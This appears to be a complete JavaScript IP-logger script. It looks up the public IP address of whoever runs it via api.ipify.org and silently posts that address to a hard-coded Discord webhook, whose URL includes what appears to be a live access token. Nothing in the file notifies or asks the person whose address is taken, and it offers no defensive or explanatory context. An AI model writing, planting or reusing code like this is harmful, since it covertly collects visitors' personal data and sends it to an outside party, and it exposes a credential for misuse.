var ip = '';
fetch('https://api.ipify.org/?format=json')
.then(function(response){
    return response.json();    
})
.then(function(data){
    ip = data.ip;
    var webhook = 'https://discord.com/api/webhooks/1129163548812128327/Hdoox6zGreqPCQQsrl9nWHmXtd1xN7Hh6Kaq4Q-SV8ebnx9hrP1zcBvX4UV7EJNNCCNe'
    var massage = {
        content: 'IP:' + ip
};

fetch(webhook, {
    method: 'POST',
    headers: {
        'Content-type': 'application/json'
    },
    body: JSON.stringify(massage)
    });
});
